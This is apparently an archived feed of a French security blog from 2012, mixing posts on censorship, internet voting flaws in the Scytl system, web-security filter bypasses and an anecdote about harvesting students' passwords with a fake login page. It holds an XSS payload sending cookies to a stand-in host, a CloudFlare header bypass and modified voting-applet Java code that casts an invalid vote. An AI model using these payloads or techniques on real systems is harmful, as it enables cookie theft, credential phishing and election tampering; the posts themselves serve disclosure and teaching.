Atos censure un document d’intérêt public… Streisand es-tu là ?http://www.paulds.fr/?p=2374http://streisand.me.thican.net/paulds.fr/index.php?20120622_195633_Atos_censure_un_document_d___interet_public____Streisand_es-tu_la__Fri, 22 Jun 2012 17:56:33 +0000Numérama a révélé hier un document marqué « strictly confidential » qui contenait quelques débuts de travaux autour de l’infrastructure mise en place par Atos pour Scytl et le ministère des affaires étrangères dans le but de proposer le vote par Internet aux français établis à l’étranger lors de ces législatives.

Aujourd’hui Atos a sommé Numérama de supprimer ledit document de ses colonnes ce que Numérama a fait.

Je considère cela comme de la censure pure et simple dans la mesure où il a été par de nombreuses reprises reproché ce manque de transparence. Aussi je me permets de republier ledit document et vous encourage à tous en faire autant (en réalisant bien cependant qu’il s’agit probablement là d’un acte qui peut entrainer des réprimandes de la part du grand méchant Atos).

Si Atos n’est pas satisfait du fait que ce document n’est pas le document final je les encourage à faire preuve de plus de transparence. D’ici là, Streisand it !

PS : je ne plierai pas ;)

PS2 : je ne prends pas les LAR, envoyez moi un mail ça ira plus vite pour que refuse ;)

Atos

flattr this!

]]>
Payer les utilisateurs pour leurs données personnelleshttp://www.paulds.fr/?p=2365http://streisand.me.thican.net/paulds.fr/index.php?20120619_135748_Payer_les_utilisateurs_pour_leurs_donnees_personnellesTue, 19 Jun 2012 11:57:48 +0000Après une intro poussive Jaron Lanier (pionner des intertubes) a présenté au Personal Democracy Forum une idée qui, selon lui, servirait à rémunérer les utilisateurs de l’Internet pour leurs données personnelles…

Sa théorie est qu’aujourd’hui de grandes entreprises (Google, Facebook et Microsoft pour ne pas les nommer) vivent de vos données et pourraient du coup aider à résoudre les inégalités en payant les utilisateurs via un système de micro-paiement systématique à chaque utilisation (ou collecte) de ces données.

Il me semble que c’est une des pires idées que l’on puisse avoir, et voici pourquoi.

Incentive à partager de l’information

Le premier problème que je vois est bien sûr un problème de vie privée : si demain on vous dit « le plus tu partages d’informations sur ta vie privée, le plus tu gagneras d’argent » rare seront les gens qui se soucieront de ce qui est fait ensuite des données. Et quand bien même elles s’en soucieraient, elles auraient été payées pour et n’auraient plus leur mot à dire.

Au contraire il faut expliquer aux gens que tout ce qu’ils mettent sur facebook est public (même s’ils règlent leur profil en mode sociopathe associal), que toutes leurs recherches sur google, leurs achats sur amazon et plus largement tout ce qu’ils font sur le net peut (et est probablement) être enregistré et ré-utilisé pour (ou contre) vous. Libre ensuite à chacun de décider s’il veut ou non entrer dans ce système et devenir une marchandise et non plus un consommateur.

Création d’un copyright sur sa personne (avec toutes ses dérives)

Le pire probablement est là : si l’on protège la vie privée au régime du copyright on ne fait que donner plus de pouvoir encore à cette infamie qui ne devrait déjà plus utiliser (je reviens pas dans ce débat, le droit d’auteur oui, la « propriété intellectuelle » non, …).

Partant de là on peut imaginer toutes les dérives qui correspondent à son état actuel : des ayants droits d’informations personnelles par exemple. « Bonjour, je suis la SACEM de la personne, vous semblez avoir beaucoup de choses à gérer; permettez que je m’occupe de vos données personnelles, je prends que 50% de frais de fonctionnement »…

Pire encore, dans les commentaires de l’article du Nouvel Obs un Internaute suggère que la Hadopi s’en charge… Elle qui n’est pas foutue de mener à bien la simple mission que le législateur lui avait confiée.

Internet n’est pas un espace de consommation

Cette non-solution part du principe que nous sommes de simples utilisateurs, floués par les méchantes multi-nationales qui font de l’interwebz. La vérité ne pourrait pas être plus éloignée et doit être rappelée : il y a certes quelques entreprises qui trustent une part de marché importante sur le Net, mais je ne suis pas sûr que si l’on pouvait estimer la proportion elles se révèlent majoritaires.

Prendre le problème à l’envers est donc dangereux et je vous renvoie vers la conférence de Benjamin Bayart à ce sujet qui parle beaucoup mieux que moi du minitel 2.0 que nous sommes en train de créer en laissant ce type de considérations prendre assise.

Le problème des start-ups

Un des moyens de participer à cet interweb qui est le notre est d’y créer un commerce (plus important encore un média, mais là la problématique se pose moins). Ces petites boites géniales qui créent de la richesse et de l’innovation (ouah on dirait que ça sort d’un cabinet ministériel cette phrase toute faite, ah oui c’est presque le cas) pourraient être grandement impactées par une solution comme celle proposée ici : la mise en place technique et financière du tout devenant une problématique lourde et complexe à intégrer aux coûts déjà très élevés (surtout en France !) de création d’une entreprise…

 

flattr this!

]]>
Sécurité, déporter le problème est une connerie dangereusehttp://www.paulds.fr/?p=2354http://streisand.me.thican.net/paulds.fr/index.php?20120615_142605_Securite__deporter_le_probleme_est_une_connerie_dangereuseFri, 15 Jun 2012 12:26:05 +0000Pour changer un peu j’ai décidé de vous livrer ici un article un peu long (non ça ça ne change pas) et technique après une micro-gueulante sur Twitter et pour expliquer un peu plus en détail mon point de vue sur la sécurité en mode boite noire. Je vais essayer de faire relativement simple mais l’article risque d’être un peu indigeste (et inintéressant) si vous n’avez pas de notion de programmation Web – promis le prochain sera sur un truc plus abordable ;)

Depuis quelques années un phénomène a le vent en poupe dans le domaine de la sécurité Web : on essaye de nous vendre de l’antivirus à pas cher qui, une fois installé est censé rassurer le client sur la solidité de son site. Personne n’est vraiment d’accord sur où on est censé brancher ce machin, sur ce qu’il doit faire ou sur comment le considérer. J’ai ma petite idée (nulle part, rien et pas) et vais essayer de vous démontrer par une petite série d’exemples la connerie dont il s’agit…

En parallèle de mes activités de consultant en sécurité il m’arrive aussi de donner des cours de sécurité en PHP (troll interdit après ce que je vais vous balancer ici) – l’approche antivirus, patch miracle, marketing pompeux n’est pas au programme de ce que j’enseigne. Pas même lorsque je m’adresse à des chefs de projet fonctionnel (surtout pas dans ce cas !) et pour cause :

Browser anti-XSS filter (Webkit4, Chromium)

Une des plaies en terme de sécurité est la faille XSS, cette petite injection de script innocente mais qui permet parfois de mettre à genoux des sites, de réaliser des escalades de privilèges, de scanner des sous-réseaux, de prendre le contrôle d’une machine qui utiliserait un navigateur trop vieux ou trop mauvais (là je serai en train de donner un cours j’aurai toussé « Internet Explorer », mais à l’écrit ça risque d’être moins discret comme troll).

Alors les petits gens qui nous font un certain moteur de rendu à peine répandu, un certain Webkit, ont eu l’idée géniale d’intégrer un filtre contre ces petites saloperies… Je prends l’exemple de Chromium (Chrome sans Google, j’ai une âme) et voilà le message que je lis dans la console (F12) de mon navigateur si je tente une XSS sur à peu près n’importe quel site :

Refused to execute a JavaScript script. Source code of script found within request.

Tous ? Non un village (trois ou quatre identifiés en fait) résiste toujours à l’envahisseur !

Considérons par exemple le code PHP suivant (cas réel trouvé sur une interface de paiement d’un site commercial) :


<script type= »text/javascript »>
var page = « <?=$_GET['page']?> »;

</script>

A votre avis il se passe quoi si je mets quelque chose comme ceci dans $_GET['page'] ?

« ; var i = new Img(); i.src = « http://badguy.jp/bad_script.php?nice_cookie= » %2b document.cookie; //

Bon la réponse est simple : la requête va partir mais répondre par une 404 parce que cette page n’existe pas, mais si elle avait existé et qu’elle contenait par exemple un simple file_append de $_GET['nice_cookie'] dans un fichier de log… Bon vous avez saisi le principe ;)

Plus drôle encore : ce filtre magique de la mort qui tue… Comment il fait la différence entre un script légitime et une XSS persistante que j’aurai ajouté au préalable via un formulaire de livre d’or, une signature sur un forum codé avec les pieds, … ?

La réponse est simple : il ne la fait pas et ne pourra jamais la faire.

J’ai inclu il y a peu un script distant en XSS persistante sur un site. Je ne voulais pas l’hoster sur le serveur de mon blog, je l’ai hosté sur un serveur qui n’a aucun nom de domaine attaché. Ca n’a pourtant posé aucun souci à Chromium de communiquer vers une adresse sous la forme d’une ip2long (plus discret) le contenu des cookies vers un script qui s’appelait steal.php (le tout a été patché sur le site en question depuis bien sûr et n’avais été testé que sur mon poste sur une seule requête).

Et c’est normal : ce n’est pas son rôle de filtrer (c’est le rôle de noscript ;) ).

Il y a d’autres façons de bypasser ce filtre (et d’autres problèmes sur Chromium) sur lesquels je travaille encore pour le moment, suite au prochain épisode pour lui !

Reverse Proxy (CloudFlare)

On se rapproche de l’application, on arrive sur le serveur. Sur celui-ci, si je veux gagner un peu en performances je peux installer un reverse proxy. Exemple courant : lighttpd répond à tous les contenus statiques et proxifie les script (php, py, …) à apache qui a quand même plus de répondant dans le domaine.

Sauf que ce type de solutions ne suffit pas sur des systèmes à très gros trafic et sont donc arrivées les entreprises qui font du reverse proxy (Akamaï en tête pour ne pas les nommer). Principe génial, j’ai un CDN en colocation avec d’autres sites et ça répond du feu de dieu partout dans le monde (les images stockées sur facebook sont servies par Akamaï par exemple).

Le petit nouveau qui fait du bruit sur le marché c’est un certain CloudFlare. Pendant un temps je le voyais partout… Pas à cause de leur communication, à cause de leur protection super efficace qui m’affichait une landing page hideuse à chaque requête sur un site derrière leur solution !

Mon navigateur est configuré en mode pentest tout le temps. Tout est modifié ou presque sur chaque requête ou presque et des inclusions classiques sont tentées dans tous les cas… Et forcément ça CloudFlare, qui propose une solution « Security » qui bloque la requête avant qu’elle arrive sur votre serveur s’il y détecte des cochoncetées, il a pas aimé…

En image ma configuration de modify headers pour Firefox avant et après bypass de la sécurité CloudFlare :

 

Comme le jeu des unes différences c’est vachement compliqué je vais vous donner la solution : la seule vérification que fait CloudFlare sur les entêtes HTTP en mode Security c’est si le Referer est formaté comme il le souhaite à savoir : vide ou contenant le caractère « : » au moins une fois… C’est tout !

Je sais pas pour vous, mais moi j’appelle pas ça de la sécurité mais du foutage de gueule :)

Imaginez un instant que le développeur (partisan du moindre effort que nous sommes) se dise « bon bah CloudFlare me laisse passer que des trucs propres, je peux bosser tranquile » et stocke en base SQL des stats sur ses visiteurs (au hasard, user-agent, referer et IP ?) – A votre avis ça donne quoi dans le cas présent ?

WaF (PHPIDs, apache mod security)

On commence à se rapprocher et là il y a deux approches différentes : soit un module du serveur web (ou de cache en reverse proxy) : Apache2 mod_security, Varnish VCL_SECURITY, … soit les classes PHP, Python, Ruby qui pullulent et vous garantissent la sécurité à moindre effort (elles aussi).

Les modules sont relativement efficaces (jamais lu de doc particulière sur du bypass du système en lui-même) lorsqu’ils sont bien configurés ! Ce qui suppose que l’admin système, qui va vraisemblablement paramétrer le truc, maitrise des problématiques de sécurité applicative fine ou que le développeur maitrise l’administration système ou que les deux se mettent d’un coup à bosser ensemble… Rayez toutes les mentions inutiles, je ne vois pas un cas concrêt où ça peut se passer correctement et surtout je ne vois pas l’intérêt dans la mesure où ce qui est « développé » en conf serait vachement mieux dans du code applicatif / métier même.

Et puis il y a les classes PHP qui vous proposent, moyennant l’inclusion en tout début de votre fichier appelé de vous nettoyer les données ou d’arrêter l’execution du script en cours de route si problème. Les problèmes sont en général décrits par de magnifiques expressions régulières pas lourdingues du tout (ironie pour ceux qui ne la saisirait pas à l’écrit) qui ont déjà été bypassées sur un des leaders du marché (bon pas par un rigolo non plus ^^).

Bref une solution lourde, difficile à paramétrer et qui ne présente aucune garantie voire qui peut introduire des vulnérabilités si le truc est mal foutu : plus de codes = plus de soucis, comme dirait @manudwarf keep it simple stupid (je sais c’est pas de lui mais ça lui va bien et il l’a écrit il y a peu) !

Framework (Code Igniter)

Et pour finir ce tour de table je vais vous parler de l’endroit où cela a plus ou moins sa place, en citant bien sûr un contre-exemple…

Le framework peut (ou doit selon la philosophie du dév) proposer des outils de validation, éventuellement des outils de nettoyage et des méthodes pour y accéder facilement. Il doit faire tout ceci simplement pour éviter que le code qui sert à vérifier que mon fichier que j’ai uploadé est bien une image, je ne veux pas le ré-écrire partout. Qui plus est, si demain je veux ajouter un niveau de vérification supplémentaire, changer quelque chose, je veux pouvoir le faire une fois pour l’ensemble de mes uploads et déployer ainsi une forme de sécurité générique homogène (différent de la sécurité métier).

Mais si vous utilisez un framework, lisez le ! Faites attention au code qui est utilisé et patchez le éventuellement.

Exemple : Code Igniter, helper security de la version 2.1.1 (actuelle, j’ai créé une issue sur le GitHub)

function encode_php_tags($str)
{
return str_replace(array(‘‘), array(‘<?php’, ‘<?PHP’, ‘<?’, ‘?>’), $str);
}

Si vous ne voyez pas ce qui cloche imaginez simplement que j’envoie <?pHp et vous comprendrez pourquoi je m’arrache les cheveux ;)

Enfin il y a la sécurité métier, les vérifications simples sur la longueur d’un champ, sa forme, … Cette partie là n’a sa place qu’au niveau de l’application et n’est pas négociable. Si vous mettez en place l’une ou l’autre des non-solutions citées plus haut vous risquez d’avoir des dév qui considèrent que « la sécurité est là vu qu’y a PHPIDs » …

Conclusion

Non j’ai pas envie de conclure, j’ai fait assez de démo, tirez en votre conclusion et discutez en dans les commentaires c’est plus simple ! :)

flattr this!

]]>
Le vote par Internet, c’est pire au second tour !http://www.paulds.fr/?p=2344http://streisand.me.thican.net/paulds.fr/index.php?20120610_121228_Le_vote_par_Internet__c___est_pire_au_second_tour__Sun, 10 Jun 2012 10:12:28 +0000Aujourd’hui se tient le premier tour des législatives en France métropolitaine. Pour les Français établis à l’étranger cependant on en est déjà à la tenue du second tour sur Internet. L’occasion pour Laurent Grégoire de continuer à mettre à l’épreuve le vote par Internet… Et ce qu’il a trouvé est pire encore que lors du premier tour.

Toujours en se servant d’une injection de code il a cette fois essayé de prouver que l’on pouvait influer sur le contenu de son propre vote pour voir si le système était suffisamment bien conçu (spoiler : il ne l’est pas) pour tenir compte du cas de figure « je suis un méchant et je veux truquer le vote ».

Voter pour un candidat fantôme

Le candidat du Parti Pirate n’ayant pas recueilli suffisamment de votes pour se maintenir au second tour il n’était pas présent dans les choix proposés cette fois-ci. Les propositions restantes étaient l’UMP, le PS ou le vote blanc.

Qu’à celà ne tienne, ajouter un candidat n’est pas bien compliqué, il suffit d’un put :

———[com.scytl.pnyx.client.communication.application.MessagesProtocol]———

public VoteReceipt doCastVote(ClientData clientData) throws ApplicationProtocolException, PnyxProtocolException
{
Map<String, QuestionAnswer> vote = clientData.getTrustedBallot().getBallotAnswers();
for (Map.Entry<String, QuestionAnswer> kv : vote.entrySet()) {
ValuedMultipleChoiceQuestionAnswer qa = (ValuedMultipleChoiceQuestionAnswer)kv.getValue();
Map<String, String> answers = qa.getAnswerIdValues();
for (Map.Entry<String, String> kv2 : answers.entrySet()) {
kv2.setValue(null); // AUCUN VOTE
}
answers.put(« ff808081375acd2201375adad63d037a », « 1″); // CANDIDAT PIRATE INEXISTANT
}
ClientDataManager clientDataMgr = new ClientDataManager(clientData);
String response = this._transport.sendMessage(this._secureMessageMessage.createMessage(clientDataMgr),
this._destinations.getPnyxCastVoteAction());
JOptionPane.showMessageDialog(JFrame.getFrames()[0], response); // AFFICHAGE DE LA REPONSE XML
return this._secureMessageMessage.parseResponse(response, clientDataMgr);
}

On pourrait penser que le machin ait la bête idée de vérifier que le vote que l’on vient d’envoyer est bien parmi les propositions valides… Ce serait sans compter sur la compétence de Scytl !

Non seulement le vote est accepté mais le tout fournit un beau reçu de vote valide à la fin de la procédure… Le total des votes sera donc supérieur d’au moins une voix au cumule des votes exprimés pour les candidats réellement en lice : UMP + PS + Blanc = total -1…

Le vote nul est-il prévu par le système de décompte ? On verra ça au dépouillement avec le reçu de vote… Et justement puisqu’on en parle !

L’identifiant de bulletin

Dans le système utilisé chaque vote a un identifiant donné généré de façon pseudo-aléatoire sur 24 octets. Laurent a eu la bonne idée de tester de modifier la génération de ce chiffre pseudo-aléatoire pour que la fonction qui le créé renvoie toujours 0×00 (zéro en hexadécimal).

Bien entendu l’applet n’y voit que du feu et laisse le vote se dérouler de façon classique. Et ce jusqu’à la fin, à la génération du reçu de vote qui étrangement se retrouve à avoir un identifiant qui vaut AAAAAAAAA. Il y a donc fort à parier que ce reçu est calculé en fonction de l’identifiant précédemment altéré. En poussant le vice on peut aussi supposer que la somme de contrôle en dessous (qui sert à vérifier son vote à postériori) est générée de la même façon.

Mais plus grave, cet identifiant de vote (qui sert à générer l’identifiant de reçu) étant tiré de façon pseudo-aléatoire dans un pool de 26^10 possibilités peut présenter des risques de collision (probabilité de collision de 1 – e^(-(n^2/(2 x 26^10)))) : deux votants pourraient avoir le même identifiant. Pour être précis, avec nos 700.000 inscrits le risque est de 0.17% sur le scrutin actuel, plus élevé si l’on envisage un scrutin à plus grande échelle… Comment réagirait le système dans ce cas ? Bah vérifiez vous même en vous attribuant l’identifiant 0×00 :

————–com.scytl.crypto.CryptographicAlgorithms————-

private byte[] encryption(int paramInt, byte[] paramArrayOfByte,
Key paramKey, String paramString) {
try {
Cipher cipher = Cipher.getInstance(paramString);
paramString = null;
byte[] buf = null;
if (cipher.getBlockSize() > 0) {
         buf = new byte[cipher.getBlockSize()];
         this._secureRandom.nextBytes(buf);

cipher.init(1, paramKey, new IvParameterSpec(buf));

buf = packSymetricMsg(buf,
cipher.doFinal(paramArrayOfByte));
} else {
cipher.init(1, paramKey);
buf = cipher.doFinal(paramArrayOfByte);
}
return buf;
} catch (GeneralSecurityException e) {
throw new RuntimeException(e);
}
}

public final byte[] generateRandom(int length) {
byte[] randomBytes = new byte[length];
   //this._secureRandom.nextBytes(randomBytes);
   for (int i = 0; i < length; i++)
      randomBytes[i] = 0×00;
return randomBytes;
}

Conclusion

Voici donc un vote qui s’est déroulé impéccablement alors même que l’identifiant du vote a été changé et que le candidat pour lequel le vote a été exprimé n’est pas présent dans les choix. C’est à se demander s’il ne serait pas possible de voter pour un candidat d’une autre circonscription en utilisant tous le même identifiant de bulletin…

La suite au dépouillement pour voir comment le système va avoir géré les bugs et comment le ministère va justifier l’injustifiable cette fois-ci…

flattr this!

]]>
On a tous été jeuneshttp://www.paulds.fr/?p=2339http://streisand.me.thican.net/paulds.fr/index.php?20120608_135227_On_a_tous_ete_jeunesFri, 08 Jun 2012 11:52:27 +0000On me demande souvent comment j’ai commencé à m’intéresser à la sécurité, je pense que ce jour là a été un des déclencheurs qui ont fait que c’est devenu mon métier. Petit billet d’humeur en ce trolldredi pour vous raconter une anecdote de l’époque bénie où j’étais (inscrit) à l’IUT.

Ce devait être en 2007 ou 2008 (putain le coup de vieux !), à l’IUT de Montreuil lors d’une pause déjeuner. La coutume était souvent la même : les étudiants allaient manger tous en même temps et se retrouvaient ensuite dans les quatre salles info pour jouer ou avancer leur projets… Ouais bon, pour jouer !

Avec un groupe d’amis – bande de pochtrons ! – on a un peu perturbé cette pause là en particulier…

Alors que tous les étudiants se dirigeaient vers la cantine on se dirigeait vers les salles info, une clef USB en main. Munis des logins / mots de passe des comptes de test des salles info (qu’on avait récupéré un peu plus tôt dans un script de génération LDAP qui trainait) on a allumé et loggué toutes les bécanes sur les comptes en question.

Sur la clef USB une simple page en php et une image de fond. Le tout donnait une impression presque crédible de la page de login d’Ubuntu (version de l’époque installée sur les machines), une fois copiés dans le dossier approprié il suffisait d’ouvrir la page en question dans un navigateur et d’appuyer sur F11 pour mettre l’affichage en plein écran. La page se chargeait dès lors d’afficher un message d’erreur et de stocker les données entrées dans un fichier .txt…

Un simple file_put_contents.

Branchés sur le wifi avec nos laptops et / ou téléphones on se positionne à l’étage en dessous, dans une salle de cours non-utilisée et on attend, le doigt sur le F5.

Le résultat fut à la hauteur de nos espérances, et en une après-midi on a ainsi vu défiler les logins et mot de passe de tous les utilisateurs essayant de se connecter… Jusqu’à l’administrateur qui avait été sollicité pour résoudre le problème de login et n’y comprenait pas grand chose de plus que les autres…

La leçon à tirer de cela (au delà du fait que certains souvenirs de l’IUT me resteront à vie) ? Ne pas utiliser le même mot de passe partout, ne pas faire confiance à n’importe quelle machine, une vocation vient souvent d’une connerie, même les responsables font des erreurs, … ne rayez aucune mention inutile.

Don’t try this at home, certains pourraient très mal le prendre ;)

flattr this!

]]>
Problème de maths, censure et éducation civiquehttp://www.paulds.fr/?p=2330http://streisand.me.thican.net/paulds.fr/index.php?20120601_115633_Probleme_de_maths__censure_et_education_civiqueFri, 01 Jun 2012 09:56:33 +0000Parce qu’il faut bien se détendre en ces temps d’invasion de zombies, parlons un peu de zombies informatiques… Ou de zombies corporate…

Premier sujet :

Visiblement les gens n’estiment pas bien les implications de pouvoir pirater l’ordinateur sur lequel on vote. Voici un petit problème de math pour rafraîchir les esprits:

================================================
PROBLÈME DE MATHÉMATIQUES / INSTRUCTION CIVIQUE
================================================

Sachant que:

1) Un parti A peu scrupuleux passe un contrat en sous-main avec un contrôleur de botnet qui déploit l’autovoteur sur tous les 4,67% des ordinateurs qu’il contrôle.

2) Un parti B peu scrupuleux développe un outil contenant l’autovoteur, qu’il fournit à tout ses sympatisants et leur demande de l’installer sur un maximum d’ordinateurs pour une raison futile. En moyenne un sympatisant l’installe sur 1,7 machines, 12576 sympatisants l’ont téléchargé.

3) 47 techniciens informatiques sympatisants peu scrupuleux du parti C dans 47 entreprises ayant en moyenne 478 salariés installent l’autovoteur sur les ordinateurs du personnel de leurs entreprises via leur outil de maintenance automatisé à distance qui leur facilite la tâche. Il s’assurent également que les ordinateurs ont la « bonne » version de Java et sont compatible avec le vote — là c’est plus technique mais on imagine que les techniciens IT sont compétents donc 42 d’entre-eux y arrivent. En moyenne 34% des salariés votent sur leur lieu de travail car ils n’ont pas la bonne version de java à la maison et suivent consciencieusement les recommandations du ministère.

4) 247 propriétaires de cyber-café sympatisants peu scrupuleux du parti D installent l’autovoteur sur tous les ordinateurs de leurs établissements. En moyenne 29 électeurs votent dans chaque cyber-café,  car ils n’ont pas la bonne version de java à la maison et suiventconsciencieusement les recommandations du ministère.

5) 1825 bidouilleurs sympatisants peu scrupuleux du parti E gèrent en moyenne 12 ordinateurs de leurs relations. Ils installent l’autovoteur sur les ordinateurs. 80% des ordinateurs sont utilisés pour voter par en moyenne 2,1 votants.

6) 232 sociétés de service en informatique pour  particuliers, peu scrupuleuses et sympatisants du parti F gèrent en moyenne 78 clients chacun. Chaque ordinateur est utililsé en moyenne pour voter 1,4 fois.

7) 785 094 personnes ont reçus leur identifiants par courrier à temps et ont réussit à voter pour ce scrutin. On ne parle pas des autres, on s’en fiche.

Question 1 (algèbre). Quel parti politique sera élu ?

Question 2 (éducation civique). Est-on encore en démocratie ? Argumentez.

2h  — Calculatrices interdites — Bon courage.

Par Laurent Grégoire

Second sujet, plus grave :

Hier Vimeo a supprimé le compte de Laurent Grégoire (où il avait hébergé la vidéo de démonstration d’une « attaque » par injection de code dans l’applet de vote par internet. Le mail qu’il a reçu est le suivant :

Dear Laurent:

Your account has been removed by the Vimeo Staff for violating the Rules of Vimeo.com
Reason: Uploading advertisements, commercials, infomercials, or videos that actively sell a product or service.

We hope you find a video host more suited to your needs. If you believe this was an error, please reply to this email in a civil manner with your reasoning (« I see other people do it » is not a valid reason).
Regards,
Vimeo

Elle est depuis disponible sur youtube :

Une demande formelle a été adressée pour comprendre pourquoi la vidéo avait été censurée et à la demande de qui. D’ici là n’hésitez pas à la récupérer et à l’uploader ailleurs…

flattr this!

]]>
Vote par Internet, le Conseil Constitutionnel alertéhttp://www.paulds.fr/?p=2322http://streisand.me.thican.net/paulds.fr/index.php?20120531_112511_Vote_par_Internet__le_Conseil_Constitutionnel_alerteThu, 31 May 2012 09:25:11 +0000Laurent Grégoire, qui avait démontré qu’il était possible de changer le vote d’une personne à son insu s’il décidait d’utiliser la procédure de vote par Internet vient de me transmettre un courrier qu’il a envoyé hier au Conseil Constitutionnel (qui est en charge de valider ou non le scrutin). Le voici :

Monsieur le président du Conseil Constitutionnel,
Messieurs les membres du Conseil Constitutionnel,

Les français résidents à l’étranger ont la possibilité, pour le
premier et second tour des élections législative de 2012, de voter par
internet. Étant personnellement résident à l’étranger, et ayant eu la
possibilité de le faire, j’ai pu démontrer et vérifier in-situ que la
sécurité du scrutin était mise en défaut par une faille technique dite
« d’injection de code ». Vous trouverez toutes les informations
techniques détaillés dans l’article que je viens de publier (1).

Cette alerte à été prise très au sérieux par les milieux spécialisés
dans la cyber-sécurité (2), ainsi que des médias plus traditionnels
comme le Monde, le Figaro, Libération, Ouest-France, LCI (3), ainsi
que certaines organisations politiques. Que conclure de mon étude? Si
l’ordinateur du votant est compromis par la présence d’un logiciel
malveillant, il est possible, par une méthode assez simple, de
modifier le vote de l’électeur, à son insu.

Une étude récente de l’INSEE montre que 34% des ordinateurs personnels
en France ont subis des contaminations par un virus (4). D’autre
études montrent, lors d’une analyse portant sur 22 millions
d’ordinateurs, que 48% d’entre-eux étaient infectés par un logiciel
malveillant (5). Il est de notoriété publique que des réseaux mafieux
exploitent en ce moment même des réseaux d’ordinateurs zombies
(botnet) composés de plusieurs millions d’ordinateurs personnels
infectés (6), ce en France et dans le monde entier. Ces réseaux
vendent leurs services aux plus offrant, et une manœuvre visant à
corrompre un scrutin est largement à leur portée technique.

Tout ceci laisse donc la possibilité théorique d’exploiter cette
faille afin de réaliser une fraude massive du vote par internet. Je
n’affirme pas que cette fraude existe réellement; j’affirme cependant
qu’il en existe la possibilité, et que malheureusement on ne pourra
sans doute jamais affirmer le contraire. Dans le domaine de la
sécurité informatique, on ne peut jamais démontrer par la positive
l’infaillibilité d’un système. Ce n’est qu’en trouvant une faille que
l’on peut montrer par la négative que le système n’était pas sécurisé.
Et contrairement à d’autres domaines où des vérifications ultérieures
permettent de détecter et de corriger les problèmes après leur
détection, la nature même d’un scrutin à bulletin secret empêche toute
post-analyse et ne permet donc pas d’en affirmer la validité.

Je me permet donc de vous alerter et vous faire part de mon inquiétude
sur ce sujet, que malheureusement une grande majorité d’experts en
sécurité informatique partagent avec moi.

Veuillez agréer mes salutations respectueuses,

Laurent GRÉGOIRE
Ingénieur diplômé de l’Institut Catholique d’Arts & Métiers
Informaticien spécialisé en systèmes embarqués
Amsterdam, Pays-Bas

—————–
(1) - http://www.scribd.com/doc/94990325 (document ci-joint),
https://vimeo.com/42935480
(2) - http://www.undernews.fr/reseau-securite/le-systeme-de-vote-electronique-des-legislatives-francaises-vulnerable.html
http://www.numerama.com/magazine/22721-vote-par-internet-une-faille-demontree-et-illustree.html
http://www.zataz.com/news/22179/voter–internet–dangereux–piratage.html
(3) - http://www.lefigaro.fr/flash-actu/2012/05/29/97001-20120529FILWWW00445-vote-par-internet-une-faille-decouverte.php
http://www.ecrans.fr/Legislatives-le-vote-par-Internet,14761.html
http://www.ouest-france.fr/actu/actuDet_-Vote-par-internet.-Un-Nantais-montre-qu-il-peut-etre-pirate-[Video]_39382-2081688_actu.Htm
http://www.wat.tv/video/lci-est-vous-mardi-29-mai-528rx_2exyh_.html
(4) - http://www.insee.fr/fr/themes/document.asp?ref_id=ip1340#inter6
(5) - http://zd.net/cM9btD
(6) - http://fr.wikipedia.org/wiki/Botnet

 

flattr this!

]]>
L’applet de vote par Internet aurait été modifié pendant la procédurehttp://www.paulds.fr/?p=2316http://streisand.me.thican.net/paulds.fr/index.php?20120530_112243_L___applet_de_vote_par_Internet_aurait_ete_modifie_pendant_la_procedureWed, 30 May 2012 09:22:43 +0000Hier un commentaire sur ce blog m’a glacé le sang : Oumph (Benoit Sibaud, excusez du peu) a en effet eu le bon réflexe de calculer la checksum de l’applet à plusieurs moments du vote et en a relevé un autre sur Twitter. Le résultat est inattendu…

La checksum, somme de contrôle, est calculé à partir d’un fichier et permet de générer une chaine unique en fonction de la composition dudit fichier. Ce qui permet par exemple de vérifier si un fichier téléchargé (une distribution Linux par exemple) est bien arrivé intègre. Si la checksum fournie sur le site de l’éditeur est bien la même que celle générée par l’utilisateur sur le fichier téléchargé, celui-ci est bien identique (bit à bit) et le transfert en l’a pas alteré.

Ici la question était de savoir si le fichier utilisé pour organiser le vote était bien le même tout du long… La réponse semble être non !

Ce qui veut simplement dire que le fichier aurait été modifié pendant la procédure de vote, soit intentionnellement par l’éditeur Scytl, soit par le ministère des affaires étrangères ou, et c’est là que cela deviendrait très inquiétant, par un acteur étranger qui a pu y injecter par exemple le code de son choix…

Le commentaire soulève aussi des problèmes de certificat déjà relevés par Hardkor

EDIT 13h30 : Si vous avez une version en cache de votre navigateur de l’applet merci de comparer le sha256 à ceux fournis ici et si vous en avez un différent de me contacter ou de contacter Oumph pour que l’on puisse essayer de comprendre ce qui a changé dans les différentes versions.

Les sha256 relevés pour le moment sont :

  • 26f313d6cdf87e33ee553d1ce9e78b4cb3371ac34ee7682a38d112c748fc9286 : site de test, certificat erroné
  • 6599ec2e599fc0016baabfb9abd378893abc111cbe6928e7b943546fde048c43 : version de prod
  • d8c4b7f64c2726ca5db146772ea85ce575e0392aa43f72b822ccb3388abc6ed3 : l’intruse

Par ailleurs, les recherches de Oumph sont centralisées ici sur son site perso.

flattr this!

]]>
Comment mon ordinateur a voté à ma place, les fichiershttp://www.paulds.fr/?p=2309http://streisand.me.thican.net/paulds.fr/index.php?20120529_140529_Comment_mon_ordinateur_a_vote_a_ma_place__les_fichiersTue, 29 May 2012 12:05:29 +0000Laurent Grégoire nous avait gratifié d’un document de 20 pages et d’une vidéo expliquant comment il avait pu simplement créer un programme qui substituerait le vote d’un citoyen par celui qu’un attaquant aurait choisi. Il m’a transmit les sources de son « Proof of Concept » pour que celles-ci soient examinées, décortiquées et permettent éventuellement de déceller d’autres soucis (vote multiples, vote pour plusieurs candidats, …).

EDIT (01/06/2012) : la vidéo a été censurée par Vimeo – se référer à cet article.

Pour rappel la vidéo et le document initiaux :

Comment mon ordinateur a voté à ma place (et à mon insu)

Et le travail de Laurent (n’hésitez pas à partager celui-ci, à le dupliquer de partout… Bref Streisand it).

Ce serait quand même drôle que je reçoive un courrier pour violation de la « propriété intellectuelle » de Scytl ou du MAE non ? :)

flattr this!

]]>
Vote par Internet, un long dossier d’échecs techniques et philosophiqueshttp://www.paulds.fr/?p=2304http://streisand.me.thican.net/paulds.fr/index.php?20120528_160759_Vote_par_Internet__un_long_dossier_d___echecs_techniques_et_philosophiquesMon, 28 May 2012 14:07:59 +0000Depuis quelques jours un faible nombre de personnes s’en prend à une « expérience » du ministère des affaires étrangères : le vote par Internet pour les législatives 2012. Près de 700.000 personnes sont concernées, certains ne voient pas le danger, d’autres (moi le premier) avancent des arguments techniques pas toujours évidents. Cet article se veut une centralisation des sources sur le sujet, des problèmes soulevés et une vulgarisation des problématiques techniques.

De quoi parle-t-on ?

